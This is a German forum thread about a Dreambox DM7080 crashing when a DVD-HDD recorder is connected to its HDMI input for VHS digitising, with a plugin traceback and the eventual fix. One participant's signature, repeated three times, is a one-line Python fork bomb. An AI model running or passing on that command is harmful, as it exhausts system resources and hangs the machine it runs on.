HDMI-IN + DVD-HDD-Recorder + VHS-Recorder + Crash!

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • HDMI-IN + DVD-HDD-Recorder + VHS-Recorder + Crash!

      Hallo zusammen,

      habe gerade auf meiner DM7080 den HDMI-In versucht und meinen alten DVD-HDD-Recorder (Sony RDR-AT105) angeschlossen. Der DVD-Recorder hat einen HDMI-Out mit mehreren Einstellungen für Auflösung, Format, Farben, etc. Wenn ich den DVD-Recorder an den Fernseher anschließe bekomme ich z.B. ein Bild mit 1920x1080 / 50p. Andere Auflösungen sind aber auch möglich.

      Wenn ich nun allerdings beim aktuellen newnigma2-daily (OE2.5) den HDMI-In mit der gelben Taste aktiviere, dann crashed mir das Teil. (siehe Log im Anhang)
      Manchmal schaltet auch einfach mein Fernseher auf einen anderen HDMI-Eingang um. Weiß nicht was das soll bzw. warum da so ein "Umschaltsignal" geschickt wird.

      Am DVD-Recorder ist leider wie irgendwann bei allen DVD-Recordern das DVD-Laufwerk kaputt. Ich würde gerne diese Aufnahmen auf der HDD vom DVD-Recorder retten. Weiteres Fernziel wäre einen VHS-Recorder an den DVD-Recorder anzuschliessen und dann das was da abgespielt wird auf der Dreambox in HD aufnehmen. Das Encoding sollte ja eigentlich der DVD-Recorder übernehemen. Die Dreambox braucht das ja nur noch aufnehmen.

      Meine Frage an die Spezialisten ... wieso klappt das bei mir nicht? Ist dieses Konstrukt wie oben beschrieben überhaupt möglich? Welche Möglichkeiten gibt es noch alte VHS-Kassetten auf der Dream aufzunehmen? Hat das schon mal jmd. versucht?

      Vielen Dank für die Hilfe.

      Gruß
      ronny8
      Dateien
    • Hallo ronny8,

      muss das unbedingt direkt von der dreambox aufgenommen werden? Ich habe vor einigen Jahren meine alten VHS-Filme zunächst auf DVDs oder BluRays gesichert und dann diese auf mein NAS übertragen. Dazu habe ich von der Firma Magix die Software "Retten Sie Ihre Videokassetten!" Version 4.0 verwendet. Mit der Software wird ein USB-Videowandler und das passende Kabel für alte Analoganschlüsse mitgeliefert. Das Paket hat seinerzeit ca. 50 Euro gekostet. Vorteilhaft war dabei, dass man einerseits am PC das Material per Software optimieren konnte, d.h. Farbbalance, Kontrast usw. und z. B. auch schneiden konnte (Werbung raus). Das ganze hat problemlos unter damals Windows 7 funktioniert. Wenn Du das Material unbedingst auf die Festplatte der dreambox spielen möchtest, schau mal nach, ob aktuelle Versionen Image-Dateien erstellen. Oder letztlich den Umweg über den DVD-/BluRayplayer auf die dreambox.
      Grüsse aus dem "ganz Nahen Osten" vom Burkhardtsdorfer

      Der Mensch wird geboren, blamiert sich, und stirbt!
    • Hast deinen DVD-HDD-Recorder direkt an der 7080 in den hdmi in gesteckt oder irgendwelche verteiler mit drann?
      Hab jetzt gerade Xbox und Blu-ray player gegen getestet kein crash.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo Burkhardtsdorfer,

      vielen Dank für die Antwort. Ich habe so einen USB-Videowandler, aber die Qualität stellt mich leider überhaupt nicht zufrieden. Das beste Ergebnis hat mir bisher dieser DVD-Recorder in Kombination mit einem guten VHS-Recorder und hohen Bitrates gebracht. Allerdings ist das ja dann bisher immer ein mpeg2 bzw. eine DVD gewesen. Ich hätte aber gerne als Enddatei ein mpeg4/H264 als *.ts in 720p oder 1080p auf der Dreambox. Schneiden und in ein mp4 verwandeln kann ich ja im Nachhinein mit Avidemux.

      Mich würde jetzt im ersten Schritt erstmal grundsätzlich interessieren: Kann ich das über diesen Weg rein theoretisch realisieren? D.H. eine ganz normale Aufnahme über den HDMI-In gespeist von meinem DVD-Recorder. Wo ist mein Denkfehler? Warum klappt das nicht und crashed? Wer kennt sich da ein bisschen besser aus? Ich habe auch schon verschiedenste Einstellungen auf dem DVD-Recorder versucht, aber jedes Mal mit dem selben Ergebniss ... ;(
    • kati910 schrieb:

      Hast deinen DVD-HDD-Recorder direkt an der 7080 in den hdmi in gesteckt oder irgendwelche verteiler mit drann?
      Hab jetzt gerade Xbox und Blu-ray player gegen getestet kein crash.
      Ja - ich bin direkt mit einem 2m HDMI Kabel vom DVD-Recorder in den HDMI-In der Dreambox. Wenn ich das gleiche Kabel am Fernseher einstecke, dann bekomme ich genau das Bild bzw. Auflösung die am DVD-Recorder als HDMI-Output eingestellt ist.
      Frage ist wohl ... was passiert in dieser Zeile 109? (Da kenne ich mich aber dann doch zu wenig aus.)

      Spoiler anzeigen

      Traceback (most recent call last):
      File "/usr/lib/enigma2/python/enigma.py", line 7375, in __call__
      return ret(*args, **kwargs)
      File "/usr/lib/enigma2/python/Components/ActionMap.py", line 51, in action
      res = self.actions[action]()
      File "/usr/lib/enigma2/python/Plugins/newnigma2/hdmi/plugin.py", line 325, in HdmiSetup
      File "/usr/lib/enigma2/python/mytest.py", line 464, in open
      self.execBegin()
      File "/usr/lib/enigma2/python/mytest.py", line 326, in execBegin
      c.execBegin()
      File "/usr/lib/enigma2/python/Screens/Screen.py", line 82, in execBegin
      x()
      File "/usr/lib/enigma2/python/Plugins/newnigma2/hdmi/plugin.py", line 109, in Basic
      AttributeError: 'NoneType' object has no attribute 'toString'
    • Da fragt er enigma2 nach der momentan laufenenden servicereverence (sender) damit dieser nach dem beenden des plugins wiederhergestellt wird und das ist eigentlich eine funktion die kommt von enigma2 und sollte eigentlich funktionieren.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Wenn kein sender läuft oder du vorher play pause gestoppt hast oder was auch immer kann da aber None zurückkommen, womit da eine Abfrage fehlt.

      Ich bin ziemlich sicher das ich das schon in meinem Plugin drinnen habe und wenn nicht würde ich es halt fixen ...
    • Hallo gutemine,

      hab´ grad nochmal Dein Plugin versucht, aber leidet crashed das auch. Nur an einer anderen Stelle ... (siehe Log im Anhang)

      Bohhh - das wäre wirklich zu geil, wenn das so klappen würde. :D

      Aber sagt doch mal ... auf dem richtigen Dampfer bin ich doch, oder? Rein theoretisch sollte das doch so klappen, oder?
      Dateien
    • kati910 schrieb:

      Da fragt er enigma2 nach der momentan laufenenden servicereverence (sender) damit dieser nach dem beenden des plugins wiederhergestellt wird und das ist eigentlich eine funktion die kommt von enigma2 und sollte eigentlich funktionieren.
      Ach - noch ein kleiner Nachtrag ... ich habe das Image frisch eingespielt und keinerlei Sendersuchlauf gemacht. Ich wollte das nur mal testen ... kann es sein, dass es daran liegt, dass ich im Prinzip keine Sender habe und der dann auf das "Nichts" nicht zurückschalten kann?
    • Dann gehe ich davon aus das problem ist damit vom Tisch.Dass nn2 ist auch gefixt mit dem morgigen update und du hast nun die Freie auswahl.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Vielen Dank für´s fixen. Sorry - musste nochmal kurz ausser Haus, aber ich habe jetzt nochmal getestet ...

      Mit Gutemines Version 1.8 habe ich nun keinen Crash mehr auch ohne Kanäle - allerdings bekomme ich bei 1080p als HDMI-Output am DVD-Recorder ein rosa Bild mit kleinen Punkten. Bei 720p bekomme ich so ein Flacker-Grünes-Disco-Licht oder nur grün als Bild.

      Auch beim NN2 mit Kanälen bekomme ich leider nur dieses geflackere. Interessant ist, dass er das offensichtlich schon erkennt, dass ich entweder auf 720p oder 1080p geschaltet habe, da er diese Auflösung an den Fernseher weiter gibt.

      Was läuft denn da nun wieder schief? Am Fernseher direkt angeschlossen bekomme ich ein ganz normales Bild ... könnte das evtl. eine Art Kopierschutz sein? Was kann ich noch testen?

      Wenn ich in der Kanalliste das HDMI-In auswähle habe ich ein schwarzes Bild. Wenn ich dann auf Aufnahme klicke kommen ewig die Zahnräder und ich muss die Kiste neu starten. Bitte nochmal um Hilfe ... :SOS: